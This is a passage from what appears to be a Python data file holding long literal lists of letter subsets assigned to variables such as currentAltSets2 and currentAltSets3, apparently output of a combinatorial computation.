'B', 'H', 'D', 'Q', 'L'], ['J', 'F', 'A', 'B', 'H', 'D', 'G', 'L'], ['J', 'F', 'K', 'P', 'O', 'Q', 'G', 'M'], ['J', 'F', 'P', 'O', 'Q', 'G', 'M', 'L'], ['J', 'A', 'P', 'O', 'D', 'Q', 'G', 'L'], ['C', 'E', 'A', 'K', 'B', 'H', 'D', 'Q'], ['C', 'E', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'E', 'A', 'B', 'H', 'O', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'Q'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'M'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'Q', 'M'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'M'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'L'], ['C', 'F', 'A', 'B', 'H', 'D', 'G', 'M'], ['C', 'F', 'A', 'B', 'O', 'Q', 'I', 'L'], ['C', 'F', 'A', 'B', 'Q', 'I', 'M', 'L'], ['C', 'F', 'K', 'O', 'Q', 'I', 'G', 'L'], ['C', 'F', 'O', 'Q', 'I', 'G', 'M', 'L'], ['C', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['C', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['C', 'A', 'K', 'B', 'H', 'D', 'I', 'L'], ['C', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'A', 'B', 'H', 'O', 'D', 'I', 'G'], ['C', 'A', 'B', 'H', 'D', 'Q', 'I', 'L'], ['C', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'O', 'D', 'Q', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['F', 'A', 'K', 'B', 'H', 'D', 'Q', 'M'], ['F', 'A', 'K', 'B', 'H', 'D', 'Q', 'L'], ['F', 'A', 'K', 'B', 'H', 'D', 'G', 'M'], ['F', 'A', 'K', 'B', 'H', 'D', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'D', 'M', 'L'], ['F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['F', 'A', 'B', 'H', 'O', 'D', 'G', 'M'], ['F', 'A', 'B', 'H', 'D', 'Q', 'M', 'L'], ['F', 'A', 'B', 'H', 'D', 'G', 'M', 'L'], ['A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['A', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['K', 'P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['K', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['K', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['P', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'O', 'I'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'K', 'O', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'K', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'O', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'P', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'P', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'O', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'A', 'P', 'D', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'O', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'A', 'O', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'D', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'P', 'O', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'O', 'Q', 'I', 'G', 'L'], ['N', 'J', 'E', 'F', 'K', 'B', 'P', 'H', 'M'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'D', 'I'], ['N', 'C', 'E', 'A', 'B', 'H', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'B', 'H', 'D', 'I', 'L'], ['N', 'C', 'E', 'A', 'B', 'O', 'Q', 'I', 'L'], ['N', 'C', 'E', 'K', 'O', 'Q', 'I', 'G', 'L'], ['N', 'K', 'P', 'H', 'O', 'D', 'I', 'G', 'M'], ['N', 'K', 'P', 'H', 'D', 'Q', 'I', 'M', 'L'], ['N', 'K', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'K', 'P', 'O', 'Q', 'I', 'G', 'M', 'L'], ['N', 'K', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'O', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'Q', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'Q'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'G'], ['J', 'C', 'E', 'F', 'K', 'P', 'O', 'G', 'M'], ['J', 'C', 'E', 'F', 'P', 'O', 'Q', 'G', 'M'], ['J', 'C', 'E', 'A', 'P', 'O', 'D', 'Q', 'G'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'M'], ['J', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['J', 'F', 'A', 'K', 'B', 'H', 'D', 'Q', 'L'], ['J', 'F', 'A', 'K', 'B', 'H', 'D', 'G', 'L'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'Q', 'M'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'G', 'M'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'M', 'L'], ['J', 'F', 'A', 'B', 'P', 'O', 'Q', 'M', 'L'], ['J', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['J', 'F', 'K', 'P', 'O', 'Q', 'G', 'M', 'L'], ['C', 'E', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['C', 'E', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'Q', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'G', 'M'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'G', 'M'], ['C', 'F', 'A', 'B', 'H', 'D', 'Q', 'I', 'L'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'M'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'M', 'L'], ['C', 'F', 'A', 'B', 'O', 'Q', 'I', 'M', 'L'], ['C', 'F', 'K', 'O', 'Q', 'I', 'G', 'M', 'L'], ['C', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'A', 'K', 'B', 'H', 'O', 'D', 'I', 'G'], ['C', 'A', 'K', 'B', 'H', 'D', 'Q', 'I', 'L'], ['C', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'G', 'M'], ['F', 'A', 'K', 'B', 'H', 'D', 'Q', 'M', 'L'], ['F', 'A', 'K', 'B', 'H', 'D', 'G', 'M', 'L'], ['F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G', 'M'], ['F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['K', 'P', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['K', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'O', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'P', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'O', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'O', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'A', 'P', 'O', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'D', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'P', 'O', 'Q', 'I', 'G', 'L'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'D', 'I', 'L'], ['N', 'C', 'E', 'A', 'B', 'H', 'O', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'B', 'H', 'D', 'Q', 'I', 'L'], ['N', 'C', 'E', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'C', 'E', 'A', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'Q'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'O', 'Q', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'G'], ['J', 'C', 'E', 'F', 'K', 'P', 'O', 'Q', 'G', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'Q', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'G', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'M', 'L'], ['J', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['J', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'G', 'M'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'Q', 'M', 'L'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'G', 'M', 'L'], ['J', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['C', 'E', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'I', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'G', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'Q', 'I', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'M', 'L'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G', 'M'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'I', 'G', 'M'], ['C', 'F', 'A', 'B', 'H', 'D', 'Q', 'I', 'M', 'L'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'M', 'L'], ['C', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'M'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'O', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'O', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'O', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'O', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'O', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'A', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'O', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'D', 'Q', 'I', 'L'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'K', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'M'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'Q', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'G', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'G', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'Q', 'M', 'L'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'G', 'M', 'L'], ['J', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['J', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'I', 'G', 'M'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'Q', 'I', 'M', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'M', 'L'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['C', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'O', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'C', 'E', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'Q', 'M'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'G', 'M'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'G', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['J', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'O', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'P', 'O', 'Q', 'I', 'G', 'M', 'L'], ['N', 'C', 'E', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'G', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['J', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'Q', 'I', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L']]
#152
currentAltSets2 = [[], ['J'], ['C'], ['E'], ['F'], ['A'], ['B'], ['H'], ['O'], ['D'], ['Q'], ['I'], ['G'], ['L'], ['J', 'E'], ['J', 'F'], ['C', 'E'], ['C', 'A'], ['C', 'O'], ['C', 'Q'], ['C', 'I'], ['C', 'G'], ['E', 'B'], ['F', 'B'], ['A', 'B'], ['A', 'O'], ['A', 'D'], ['A', 'Q'], ['A', 'L'], ['B', 'H'], ['H', 'D'], ['O', 'Q'], ['O', 'I'], ['O', 'G'], ['D', 'Q'], ['D', 'I'], ['D', 'G'], ['D', 'L'], ['Q', 'L'], ['I', 'G'], ['I', 'L'], ['G', 'L'], ['J', 'E', 'F'], ['J', 'F', 'B'], ['C', 'E', 'A'], ['C', 'A', 'B'], ['C', 'A', 'O'], ['C', 'A', 'D'], ['C', 'A', 'Q'], ['C', 'A', 'I'], ['C', 'O', 'Q'], ['C', 'O', 'I'], ['C', 'O', 'G'], ['C', 'I', 'G'], ['C', 'I', 'L'], ['A', 'O', 'Q'], ['A', 'D', 'Q'], ['A', 'D', 'G'], ['A', 'D', 'L'], ['A', 'Q', 'L'], ['O', 'D', 'G'], ['O', 'Q', 'G'], ['O', 'Q', 'L'], ['O', 'I', 'G'], ['D', 'Q', 'L'], ['D', 'I', 'G'], ['D', 'I', 'L'], ['D', 'G', 'L'], ['Q', 'I', 'L'], ['I', 'G', 'L'], ['J', 'E', 'F', 'B'], ['C', 'E', 'A', 'B'], ['C', 'F', 'A', 'B'], ['C', 'A', 'O', 'Q'], ['C', 'A', 'O', 'I'], ['C', 'A', 'D', 'Q'], ['C', 'A', 'D', 'I'], ['C', 'A', 'D', 'G'], ['C', 'A', 'I', 'L'], ['C', 'O', 'Q', 'G'], ['C', 'O', 'I', 'G'], ['C', 'Q', 'I', 'L'], ['C', 'I', 'G', 'L'], ['A', 'B', 'H', 'D'], ['A', 'O', 'D', 'G'], ['A', 'O', 'Q', 'L'], ['A', 'D', 'Q', 'L'], ['A', 'D', 'G', 'L'], ['O', 'D', 'Q', 'G'], ['O', 'D', 'I', 'G'], ['O', 'Q', 'I', 'L'], ['O', 'Q', 'G', 'L'], ['D', 'Q', 'I', 'L'], ['D', 'I', 'G', 'L'], ['C', 'A', 'B', 'H', 'D'], ['C', 'A', 'O', 'D', 'G'], ['C', 'A', 'D', 'I', 'G'], ['C', 'A', 'D', 'I', 'L'], ['C', 'A', 'Q', 'I', 'L'], ['C', 'O', 'Q', 'I', 'L'], ['A', 'O', 'D', 'Q', 'G'], ['O', 'D', 'Q', 'G', 'L'], ['O', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'B'], ['C', 'F', 'A', 'B', 'H', 'D'], ['C', 'A', 'K', 'B', 'H', 'D'], ['C', 'A', 'B', 'H', 'D', 'I'], ['C', 'A', 'B', 'H', 'D', 'G'], ['C', 'A', 'O', 'D', 'Q', 'G'], ['C', 'A', 'O', 'D', 'I', 'G'], ['C', 'A', 'O', 'Q', 'I', 'L'], ['C', 'A', 'D', 'Q', 'I', 'L'], ['C', 'A', 'D', 'I', 'G', 'L'], ['C', 'O', 'Q', 'I', 'G', 'L'], ['A', 'O', 'D', 'Q', 'G', 'L'], ['O', 'D', 'Q', 'I', 'G', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'D'], ['C', 'F', 'A', 'B', 'H', 'D', 'I'], ['C', 'F', 'A', 'B', 'H', 'D', 'G'], ['C', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'G'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['C', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L']]
#46
currentAltSets3 = [[], ['A'], ['C', 'A'], ['A', 'B'], ['A', 'D'], ['C', 'A', 'B'], ['C', 'A', 'D'], ['C', 'F', 'A', 'B'], ['C', 'A', 'D', 'I'], ['C', 'A', 'D', 'G'], ['A', 'B', 'H', 'D'], ['C', 'A', 'B', 'H', 'D'], ['C', 'A', 'D', 'I', 'G'], ['J', 'C', 'E', 'F', 'A', 'B'], ['C', 'F', 'A', 'B', 'H', 'D'], ['C', 'A', 'B', 'H', 'D', 'I'], ['C', 'A', 'B', 'H', 'D', 'G'], ['C', 'A', 'D', 'I', 'G', 'L'], ['C', 'F', 'A', 'B', 'H', 'D', 'I'], ['C', 'F', 'A', 'B', 'H', 'D', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'G'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I'], ['J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'F', 'A', 'K', 'B', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'H', 'D', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 'E', 'F', 'A', 'K', 'B', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'J', 'C', 